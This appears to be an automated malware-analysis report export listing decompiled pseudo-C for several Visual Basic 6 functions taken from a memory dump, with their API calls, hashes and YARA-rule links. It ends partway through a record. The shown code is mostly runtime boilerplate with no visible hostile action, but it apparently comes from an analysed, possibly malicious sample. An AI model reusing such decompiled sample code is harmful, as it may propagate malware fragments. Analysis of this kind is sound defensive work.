0x00421351
0x00421352
0x00421354
0x0042135c
0x00421363
0x00421364
0x00421391
0x00421399
0x004213a1
0x004213a9
0x004213ae

APIs

__vbaChkstk.MSVBVM60(?,00401536), ref: 00420D8D
__vbaNew2.MSVBVM60(00405078,00425698,?,?,?,?,00401536), ref: 00420DB2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014), ref: 00420DFF
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,000000B8), ref: 00420E46
__vbaFreeObj.MSVBVM60(00000000,?,004050A8,000000B8), ref: 00420E65
#609.MSVBVM60(00000000,?,004050A8,000000B8), ref: 00420E6A
#557.MSVBVM60(00000008), ref: 00420E7D
__vbaFreeVar.MSVBVM60(00000008), ref: 00420E94
__vbaNew2.MSVBVM60(00405078,00425698,00000008), ref: 00420EB8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014), ref: 00420F05
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,000000D0), ref: 00420F4C
__vbaStrMove.MSVBVM60(00000000,?,004050A8,000000D0), ref: 00420F76
__vbaFreeObj.MSVBVM60(00000000,?,004050A8,000000D0), ref: 00420F7E
__vbaNew2.MSVBVM60(00405078,00425698), ref: 00420F96
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014), ref: 00420FE3
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,00000070), ref: 00421024
__vbaFreeObj.MSVBVM60(00000000,?,004050A8,00000070), ref: 00421043
__vbaFpI4.MSVBVM60(00000000,?,004050A8,00000070), ref: 0042104E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00404AF0,00000064), ref: 00421077
#574.MSVBVM60(00000002,00000008), ref: 0042109D
__vbaStrMove.MSVBVM60(00000002,00000008), ref: 004210A7
__vbaStrCmp.MSVBVM60(0040628C,00000000,00000002,00000008), ref: 004210B2
__vbaFreeStr.MSVBVM60(0040628C,00000000,00000002,00000008), ref: 004210C6
__vbaFreeVar.MSVBVM60(0040628C,00000000,00000002,00000008), ref: 004210CE
__vbaNew2.MSVBVM60(00405078,00425698,0040628C,00000000,00000002,00000008), ref: 004210F2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014,?,?,?,?,0040628C,00000000,00000002,00000008), ref: 0042113F
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,00000140,?,?,?,?,0040628C,00000000,00000002,00000008), ref: 00421186
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,0040628C,00000000,00000002,00000008), ref: 004211A5
__vbaNew2.MSVBVM60(00405078,00425698,?,?,?,?,?,?,0040628C,00000000,00000002,00000008), ref: 004211BD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014,?,?,?,?,?,?,0040628C,00000000,00000002,00000008), ref: 0042120A
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,00000130,?,?,?,?,?,?,?,?,0040628C,00000000,00000002,00000008), ref: 00421251
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,0040628C,00000000,00000002,00000008), ref: 0042127B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,0040628C,00000000,00000002,00000008), ref: 00421283
__vbaNew2.MSVBVM60(00405078,00425698,?,?,?,?,?,?,?,?,0040628C,00000000,00000002,00000008), ref: 0042129B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000048,?,?,?,?,?,?,?,?,?,?,0040628C,00000000), ref: 004212ED
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,0040628C,00000000,00000002,00000008), ref: 00421317
#613.MSVBVM60(?,00000002,0040628C,00000000,00000002,00000008), ref: 00421332
__vbaStrVarMove.MSVBVM60(?,?,00000002,0040628C,00000000,00000002,00000008), ref: 0042133B
__vbaStrMove.MSVBVM60(?,?,00000002,0040628C,00000000,00000002,00000008), ref: 00421345
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,00000002,0040628C,00000000,00000002,00000008), ref: 00421354
__vbaFreeStr.MSVBVM60(004213AF), ref: 00421391
__vbaFreeStr.MSVBVM60(004213AF), ref: 00421399
__vbaFreeStr.MSVBVM60(004213AF), ref: 004213A1
__vbaFreeStr.MSVBVM60(004213AF), ref: 004213A9

Memory Dump Source

Source File: 00000000.00000002.374396224.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.374393124.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374417553.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374421574.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374425259.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$#557#574#609#613ChkstkList
String ID:
API String ID: 628647532-0
Opcode ID: 1ca6a2574c89e22041bcf18230ca84174da1735bb9b571dba0907ac560aeaed5
Instruction ID: aa88e138577a5549e9604a8a0e154988ebc8ceec3414fd2cc4d324faa4b67075
Opcode Fuzzy Hash: 1ca6a2574c89e22041bcf18230ca84174da1735bb9b571dba0907ac560aeaed5
Instruction Fuzzy Hash: 03122770E01628EFDB20DFA1D845BDDBBB4BF18305FA0416AE105B72A2DB785985CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00418E4F, Relevance: 52.8, APIs: 35, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00418E4F(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				intOrPtr _v56;
				signed int _v60;
				char _v64;
				intOrPtr _v72;
				char _v80;
				char _v96;
				char _v116;
				intOrPtr* _v120;
				signed int _v124;
				void* _v128;
				signed int _v132;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr* _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr* _v164;
				signed int _v168;
				signed int _v172;
				intOrPtr* _v176;
				signed int _v180;
				intOrPtr* _v184;
				signed int _v188;
				char* _t147;
				signed int _t151;
				signed int _t157;
				signed int _t162;
				signed int _t169;
				signed int _t174;
				char* _t179;
				signed int _t183;
				intOrPtr _t222;

				_push(0x401536);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t222;
				L00401530();
				_v12 = _t222;
				_v8 = 0x401438;
				_push(0x4050bc);
				L00401674();
				asm("fcomp qword [0x401430]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					if( *0x425698 != 0) {
						_v152 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v152 = 0x425698;
					}
					_v120 =  *_v152;
					_t157 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v64);
					asm("fclex");
					_v124 = _t157;
					if(_v124 >= 0) {
						_t16 =  &_v156;
						 *_t16 = _v156 & 0x00000000;
						__eflags =  *_t16;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v120);
						_push(_v124);
						L004017B8();
						_v156 = _t157;
					}
					_v128 = _v64;
					_t162 =  *((intOrPtr*)( *_v128 + 0x58))(_v128,  &_v60);
					asm("fclex");
					_v132 = _t162;
					if(_v132 >= 0) {
						_t29 =  &_v160;
						 *_t29 = _v160 & 0x00000000;
						__eflags =  *_t29;
					} else {
						_push(0x58);
						_push(0x4050a8);
						_push(_v128);
						_push(_v132);
						L004017B8();
						_v160 = _t162;
					}
					_v140 = _v60;
					_v60 = _v60 & 0x00000000;
					L00401752();
					L0040178E();
					if( *0x425698 != 0) {
						_v164 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v164 = 0x425698;
					}
					_v120 =  *_v164;
					_t169 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v64);
					asm("fclex");
					_v124 = _t169;
					if(_v124 >= 0) {
						_t51 =  &_v168;
						 *_t51 = _v168 & 0x00000000;
						__eflags =  *_t51;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v120);
						_push(_v124);
						L004017B8();
						_v168 = _t169;
					}
					_v128 = _v64;
					_t174 =  *((intOrPtr*)( *_v128 + 0xe0))(_v128,  &_v60);
					asm("fclex");
					_v132 = _t174;
					if(_v132 >= 0) {
						_t64 =  &_v172;
						 *_t64 = _v172 & 0x00000000;
						__eflags =  *_t64;
					} else {
						_push(0xe0);
						_push(0x4050a8);
						_push(_v128);
						_push(_v132);
						L004017B8();
						_v172 = _t174;
					}
					_v144 = _v60;
					_v60 = _v60 & 0x00000000;
					L00401752();
					L0040178E();
					if( *0x425010 != 0) {
						_v176 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v176 = 0x425010;
					}
					_t179 =  &_v64;
					L004017C4();
					_v120 = _t179;
					_t183 =  *((intOrPtr*)( *_v120 + 0x48))(_v120,  &_v60, _t179,  *((intOrPtr*)( *((intOrPtr*)( *_v176)) + 0x304))( *_v176));
					asm("fclex");
					_v124 = _t183;
					if(_v124 >= 0) {
						_t89 =  &_v180;
						 *_t89 = _v180 & 0x00000000;
						__eflags =  *_t89;
					} else {
						_push(0x48);
						_push(0x405098);
						_push(_v120);
						_push(_v124);
						L004017B8();
						_v180 = _t183;
					}
					_v148 = _v60;
					_v60 = _v60 & 0x00000000;
					_v72 = _v148;
					_v80 = 8;
					_push( &_v80);
					_push( &_v96);
					L0040166E();
					L00401764();
					L0040178E();
					L00401794();
				}
				_push( &_v80);
				L00401668();
				_push( &_v80);
				L00401728();
				L00401752();
				L00401794();
				_v72 = 0x17;
				_v80 = 2;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_push( &_v80);
				L00401662();
				L00401752();
				L00401794();
				if( *0x425010 != 0) {
					_v184 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404358);
					L004017BE();
					_v184 = 0x425010;
				}
				_t147 =  &_v64;
				L004017C4();
				_v120 = _t147;
				_t151 =  *((intOrPtr*)( *_v120 + 0x70))(_v120,  &_v116, _t147,  *((intOrPtr*)( *((intOrPtr*)( *_v184)) + 0x308))( *_v184));
				asm("fclex");
				_v124 = _t151;
				if(_v124 >= 0) {
					_t129 =  &_v188;
					 *_t129 = _v188 & 0x00000000;
					__eflags =  *_t129;
				} else {
					_push(0x70);
					_push(0x405038);
					_push(_v120);
					_push(_v124);
					L004017B8();
					_v188 = _t151;
				}
				_v56 = _v116;
				L0040178E();
				asm("wait");
				_push(0x419267);
				L00401794();
				L00401740();
				L00401740();
				L00401740();
				L00401740();
				return _t151;
			}

0x00418e54
0x00418e5f
0x00418e60
0x00418e6c
0x00418e74
0x00418e77
0x00418e7e
0x00418e83
0x00418e88
0x00418e8e
0x00418e90
0x00418e91
0x00418e9e
0x00418ebb
0x00418ea0
0x00418ea0
0x00418ea5
0x00418eaa
0x00418eaf
0x00418eaf
0x00418ecd
0x00418edc
0x00418edf
0x00418ee1
0x00418ee8
0x00418f04
0x00418f04
0x00418f04
0x00418eea
0x00418eea
0x00418eec
0x00418ef1
0x00418ef4
0x00418ef7
0x00418efc
0x00418efc
0x00418f0e
0x00418f1d
0x00418f20
0x00418f22
0x00418f29
0x00418f45
0x00418f45
0x00418f45
0x00418f2b
0x00418f2b
0x00418f2d
0x00418f32
0x00418f35
0x00418f38
0x00418f3d
0x00418f3d
0x00418f4f
0x00418f55
0x00418f62
0x00418f6a
0x00418f76
0x00418f93
0x00418f78
0x00418f78
0x00418f7d
0x00418f82
0x00418f87
0x00418f87
0x00418fa5
0x00418fb4
0x00418fb7
0x00418fb9
0x00418fc0
0x00418fdc
0x00418fdc
0x00418fdc
0x00418fc2
0x00418fc2
0x00418fc4
0x00418fc9
0x00418fcc
0x00418fcf
0x00418fd4
0x00418fd4
0x00418fe6
0x00418ff5
0x00418ffb
0x00418ffd
0x00419004
0x00419023
0x00419023
0x00419023
0x00419006
0x00419006
0x0041900b
0x00419010
0x00419013
0x00419016
0x0041901b
0x0041901b
0x0041902d
0x00419033
0x00419040
0x00419048
0x00419054
0x00419071
0x00419056
0x00419056
0x0041905b
0x00419060
0x00419065
0x00419065
0x00419095
0x00419099
0x0041909e
0x004190ad
0x004190b0
0x004190b2
0x004190b9
0x004190d5
0x004190d5
0x004190d5
0x004190bb
0x004190bb
0x004190bd
0x004190c2
0x004190c5
0x004190c8
0x004190cd
0x004190cd
0x004190df
0x004190e5
0x004190ef
0x004190f2
0x004190fc
0x00419100
0x00419101
0x0041910c
0x00419114
0x0041911c
0x0041911c
0x00419124
0x00419125
0x0041912d
0x0041912e
0x00419138
0x00419140
0x00419145
0x0041914c
0x00419153
0x00419155
0x00419157
0x00419159
0x0041915e
0x0041915f
0x00419169
0x00419171
0x0041917d
0x0041919a
0x0041917f
0x0041917f
0x00419184
0x00419189
0x0041918e
0x0041918e
0x004191be
0x004191c2
0x004191c7
0x004191d6
0x004191d9
0x004191db
0x004191e2
0x004191fe
0x004191fe
0x004191fe
0x004191e4
0x004191e4
0x004191e6
0x004191eb
0x004191ee
0x004191f1
0x004191f6
0x004191f6
0x00419208
0x0041920e
0x00419213
0x00419214
0x00419241
0x00419249
0x00419251
0x00419259
0x00419261
0x00419266

APIs

__vbaChkstk.MSVBVM60(?,00401536), ref: 00418E6C
__vbaR8Str.MSVBVM60(004050BC,?,?,?,?,00401536), ref: 00418E83
__vbaNew2.MSVBVM60(00405078,00425698,004050BC,?,?,?,?,00401536), ref: 00418EAA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014), ref: 00418EF7
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,00000058), ref: 00418F38
__vbaStrMove.MSVBVM60(00000000,?,004050A8,00000058), ref: 00418F62
__vbaFreeObj.MSVBVM60(00000000,?,004050A8,00000058), ref: 00418F6A
__vbaNew2.MSVBVM60(00405078,00425698), ref: 00418F82
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014), ref: 00418FCF
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,000000E0), ref: 00419016
__vbaStrMove.MSVBVM60(00000000,?,004050A8,000000E0), ref: 00419040
__vbaFreeObj.MSVBVM60(00000000,?,004050A8,000000E0), ref: 00419048
__vbaNew2.MSVBVM60(00404358,00425010), ref: 00419060
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419099
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405098,00000048), ref: 004190C8
#666.MSVBVM60(?,00000008), ref: 00419101
__vbaVarMove.MSVBVM60(?,00000008), ref: 0041910C
__vbaFreeObj.MSVBVM60(?,00000008), ref: 00419114
__vbaFreeVar.MSVBVM60(?,00000008), ref: 0041911C
#612.MSVBVM60(?,004050BC,?,?,?,?,00401536), ref: 00419125
__vbaStrVarMove.MSVBVM60(?,?,004050BC,?,?,?,?,00401536), ref: 0041912E
__vbaStrMove.MSVBVM60(?,?,004050BC,?,?,?,?,00401536), ref: 00419138
__vbaFreeVar.MSVBVM60(?,?,004050BC,?,?,?,?,00401536), ref: 00419140
#702.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,?,?), ref: 0041915F
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,?,?), ref: 00419169
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,?,?), ref: 00419171
__vbaNew2.MSVBVM60(00404358,00425010,00000002,000000FF,000000FE,000000FE,000000FE), ref: 00419189
__vbaObjSet.MSVBVM60(?,00000000), ref: 004191C2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,00000070), ref: 004191F1
__vbaFreeObj.MSVBVM60(00000000,?,00405038,00000070), ref: 0041920E
__vbaFreeVar.MSVBVM60(00419267), ref: 00419241
__vbaFreeStr.MSVBVM60(00419267), ref: 00419249
__vbaFreeStr.MSVBVM60(00419267), ref: 00419251
__vbaFreeStr.MSVBVM60(00419267), ref: 00419259
__vbaFreeStr.MSVBVM60(00419267), ref: 00419261

Memory Dump Source

Source File: 00000000.00000002.374396224.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.374393124.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374417553.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374421574.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374425259.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$New2$#612#666#702Chkstk
String ID:
API String ID: 1476624330-0
Opcode ID: 59a3e4ceb68c5fcd472a9d5640a59103afad084d1ec8f0d90839314ea9526510
Instruction ID: c55b2968a7df1a769694324a48dece06a210ff353b9a7789353bdbf109d73051
Opcode Fuzzy Hash: 59a3e4ceb68c5fcd472a9d5640a59103afad084d1ec8f0d90839314ea9526510
Instruction Fuzzy Hash: 9CC10570E00618EFDB20EFA5C885BDDBBB5BF08304F60416AE015B72A2DB785985CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041FB17, Relevance: 18.1, APIs: 12, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0041FB17(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				void* _v44;
				signed int _v48;
				void* _v52;
				char _v68;
				char _v84;
				intOrPtr* _v88;
				signed int _v92;
				intOrPtr* _v96;
				signed int _v100;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				signed int _v124;
				signed int _t60;
				signed int _t65;
				char* _t69;
				void* _t81;
				void* _t83;
				intOrPtr _t84;

				_t84 = _t83 - 0xc;
				 *[fs:0x0] = _t84;
				L00401530();
				_v16 = _t84;
				_v12 = 0x401468;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x64,  *[fs:0x0], 0x401536, _t81);
				if( *0x425698 != 0) {
					_v116 = 0x425698;
				} else {
					_push(0x425698);
					_push(0x405078);
					L004017BE();
					_v116 = 0x425698;
				}
				_v88 =  *_v116;
				_t60 =  *((intOrPtr*)( *_v88 + 0x14))(_v88,  &_v52);
				asm("fclex");
				_v92 = _t60;
				if(_v92 >= 0) {
					_v120 = _v120 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x405068);
					_push(_v88);
					_push(_v92);
					L004017B8();
					_v120 = _t60;
				}
				_v96 = _v52;
				_t65 =  *((intOrPtr*)( *_v96 + 0xd0))(_v96,  &_v48);
				asm("fclex");
				_v100 = _t65;
				if(_v100 >= 0) {
					_v124 = _v124 & 0x00000000;
				} else {
					_push(0xd0);
					_push(0x4050a8);
					_push(_v96);
					_push(_v100);
					L004017B8();
					_v124 = _t65;
				}
				_v112 = _v48;
				_v48 = _v48 & 0x00000000;
				L00401752();
				L0040178E();
				_push( &_v68);
				L00401758();
				_push(1);
				_push( &_v68);
				_t69 =  &_v84;
				_push(_t69);
				L0040175E();
				L00401764();
				L00401794();
				_push(0x41fc80);
				L00401794();
				L00401740();
				return _t69;
			}

0x0041fb1a
0x0041fb29
0x0041fb33
0x0041fb3b
0x0041fb3e
0x0041fb45
0x0041fb54
0x0041fb5e
0x0041fb78
0x0041fb60
0x0041fb60
0x0041fb65
0x0041fb6a
0x0041fb6f
0x0041fb6f
0x0041fb84
0x0041fb93
0x0041fb96
0x0041fb98
0x0041fb9f
0x0041fbb8
0x0041fba1
0x0041fba1
0x0041fba3
0x0041fba8
0x0041fbab
0x0041fbae
0x0041fbb3
0x0041fbb3
0x0041fbbf
0x0041fbce
0x0041fbd4
0x0041fbd6
0x0041fbdd
0x0041fbf9
0x0041fbdf
0x0041fbdf
0x0041fbe4
0x0041fbe9
0x0041fbec
0x0041fbef
0x0041fbf4
0x0041fbf4
0x0041fc00
0x0041fc03
0x0041fc0d
0x0041fc15
0x0041fc1d
0x0041fc1e
0x0041fc23
0x0041fc28
0x0041fc29
0x0041fc2c
0x0041fc2d
0x0041fc38
0x0041fc40
0x0041fc45
0x0041fc72
0x0041fc7a
0x0041fc7f

APIs

__vbaChkstk.MSVBVM60(?,00401536), ref: 0041FB33
__vbaNew2.MSVBVM60(00405078,00425698,?,?,?,?,00401536), ref: 0041FB6A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014), ref: 0041FBAE
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,000000D0), ref: 0041FBEF
__vbaStrMove.MSVBVM60 ref: 0041FC0D
__vbaFreeObj.MSVBVM60 ref: 0041FC15
#610.MSVBVM60(?), ref: 0041FC1E
#552.MSVBVM60(?,?,00000001,?), ref: 0041FC2D
__vbaVarMove.MSVBVM60(?,?,00000001,?), ref: 0041FC38
__vbaFreeVar.MSVBVM60(?,?,00000001,?), ref: 0041FC40
__vbaFreeVar.MSVBVM60(0041FC80,?,?,00000001,?), ref: 0041FC72
__vbaFreeStr.MSVBVM60(0041FC80,?,?,00000001,?), ref: 0041FC7A

Memory Dump Source

Source File: 00000000.00000002.374396224.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.374393124.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374417553.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374421574.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374425259.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#552#610ChkstkNew2
String ID:
API String ID: 407087230-0
Opcode ID: 2a9c8e05931be6a5fd8b1e4d8781debed7b18c9e3c76300fd8143505d03e590a
Instruction ID: 84da696e657b4218abf16d9315f3cfedb323e5b85cbe2a0e8e59dd5e1322b499
Opcode Fuzzy Hash: 2a9c8e05931be6a5fd8b1e4d8781debed7b18c9e3c76300fd8143505d03e590a
Instruction Fuzzy Hash: 3D41B371940618EFCB00EFE5C885BDDBBB4BF18705F60412AE106BB2A1D778694ADF58

Uniqueness

Uniqueness Score: -1.00%

Function 00420306, Relevance: 13.6, APIs: 9, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00420306(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				char _v28;
				void* _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr* _v44;
				signed int _v48;
				intOrPtr* _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				signed int _t59;
				signed int _t63;
				char* _t67;
				signed int _t71;
				short _t72;
				intOrPtr _t84;

				_push(0x401536);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t84;
				_push(0x34);
				L00401530();
				_v12 = _t84;
				_v8 = 0x4014a0;
				if( *0x425698 != 0) {
					_v56 = 0x425698;
				} else {
					_push(0x425698);
					_push(0x405078);
					L004017BE();
					_v56 = 0x425698;
				}
				_v36 =  *_v56;
				_t59 =  *((intOrPtr*)( *_v36 + 0x4c))(_v36,  &_v28);
				asm("fclex");
				_v40 = _t59;
				if(_v40 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x4c);
					_push(0x405068);
					_push(_v36);
					_push(_v40);
					L004017B8();
					_v60 = _t59;
				}
				_v44 = _v28;
				_t63 =  *((intOrPtr*)( *_v44 + 0x28))(_v44);
				asm("fclex");
				_v48 = _t63;
				if(_v48 >= 0) {
					_v64 = _v64 & 0x00000000;
				} else {
					_push(0x28);
					_push(0x405088);
					_push(_v44);
					_push(_v48);
					L004017B8();
					_v64 = _t63;
				}
				L0040178E();
				if( *0x425010 != 0) {
					_v68 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404358);
					L004017BE();
					_v68 = 0x425010;
				}
				_t67 =  &_v28;
				L004017C4();
				_v36 = _t67;
				_t71 =  *((intOrPtr*)( *_v36 + 0xf8))(_v36,  &_v32, _t67,  *((intOrPtr*)( *((intOrPtr*)( *_v68)) + 0x300))( *_v68));
				asm("fclex");
				_v40 = _t71;
				if(_v40 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x405048);
					_push(_v36);
					_push(_v40);
					L004017B8();
					_v72 = _t71;
				}
				_t72 = _v32;
				_v24 = _t72;
				L0040178E();
				_push(0x42047b);
				return _t72;
			}

0x0042030b
0x00420316
0x00420317
0x0042031e
0x00420321
0x00420329
0x0042032c
0x0042033a
0x00420354
0x0042033c
0x0042033c
0x00420341
0x00420346
0x0042034b
0x0042034b
0x00420360
0x0042036f
0x00420372
0x00420374
0x0042037b
0x00420394
0x0042037d
0x0042037d
0x0042037f
0x00420384
0x00420387
0x0042038a
0x0042038f
0x0042038f
0x0042039b
0x004203a6
0x004203a9
0x004203ab
0x004203b2
0x004203cb
0x004203b4
0x004203b4
0x004203b6
0x004203bb
0x004203be
0x004203c1
0x004203c6
0x004203c6
0x004203d2
0x004203de
0x004203f8
0x004203e0
0x004203e0
0x004203e5
0x004203ea
0x004203ef
0x004203ef
0x00420413
0x00420417
0x0042041c
0x0042042b
0x00420431
0x00420433
0x0042043a
0x00420456
0x0042043c
0x0042043c
0x00420441
0x00420446
0x00420449
0x0042044c
0x00420451
0x00420451
0x0042045a
0x0042045e
0x00420465
0x0042046a
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401536), ref: 00420321
__vbaNew2.MSVBVM60(00405078,00425698,?,?,?,?,00401536), ref: 00420346
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,0000004C,?,?,?,?,?,?,?,?,?,?,00401536), ref: 0042038A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405088,00000028,?,?,?,?,?,?,?,?,?,?,00401536), ref: 004203C1
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401536), ref: 004203D2
__vbaNew2.MSVBVM60(00404358,00425010,?,?,?,?,?,?,?,?,?,?,?,?,00401536), ref: 004203EA
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401536), ref: 00420417
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405048,000000F8), ref: 0042044C
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401536), ref: 00420465

Memory Dump Source

Source File: 00000000.00000002.374396224.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.374393124.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374417553.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374421574.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374425259.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2$Chkstk
String ID:
API String ID: 2989710064-0
Opcode ID: 3bcf7f2987a64ca94bb6cb9674ea3df678075c259057e4c3f3c91d22257b5f1e
Instruction ID: 90aa5f642ba2b0a629a431697f41bc1f6dfbc14ac3bb60727621bb1f49441155
Opcode Fuzzy Hash: 3bcf7f2987a64ca94bb6cb9674ea3df678075c259057e4c3f3c91d22257b5f1e
Instruction Fuzzy Hash: F0410074A41628EFCB10EF94D885BEDBBF4FF08314FA0402AE501B72A1C7795945DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041FA3F, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0041FA3F(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				intOrPtr* _v28;
				signed int _v32;
				intOrPtr* _v40;
				signed int _v44;
				char* _t26;
				signed int _t29;
				intOrPtr _t40;

				_push(0x401536);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t40;
				_push(0x18);
				L00401530();
				_v12 = _t40;
				_v8 = 0x401458;
				if( *0x425010 != 0) {
					_v40 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404358);
					L004017BE();
					_v40 = 0x425010;
				}
				_t26 =  &_v24;
				L004017C4();
				_v28 = _t26;
				_t29 =  *((intOrPtr*)( *_v28 + 0x208))(_v28, _t26,  *((intOrPtr*)( *((intOrPtr*)( *_v40)) + 0x304))( *_v40));
				asm("fclex");
				_v32 = _t29;
				if(_v32 >= 0) {
					_v44 = _v44 & 0x00000000;
				} else {
					_push(0x208);
					_push(0x405098);
					_push(_v28);
					_push(_v32);
					L004017B8();
					_v44 = _t29;
				}
				L0040178E();
				_push(0x41fb04);
				return _t29;
			}

0x0041fa44
0x0041fa4f
0x0041fa50
0x0041fa57
0x0041fa5a
0x0041fa62
0x0041fa65
0x0041fa73
0x0041fa8d
0x0041fa75
0x0041fa75
0x0041fa7a
0x0041fa7f
0x0041fa84
0x0041fa84
0x0041faa8
0x0041faac
0x0041fab1
0x0041fabc
0x0041fac2
0x0041fac4
0x0041facb
0x0041fae7
0x0041facd
0x0041facd
0x0041fad2
0x0041fad7
0x0041fada
0x0041fadd
0x0041fae2
0x0041fae2
0x0041faee
0x0041faf3
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401536), ref: 0041FA5A
__vbaNew2.MSVBVM60(00404358,00425010,?,?,?,?,00401536), ref: 0041FA7F
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,00401536), ref: 0041FAAC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405098,00000208,?,?,?,?,?,?,00401536), ref: 0041FADD
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00401536), ref: 0041FAEE

Memory Dump Source

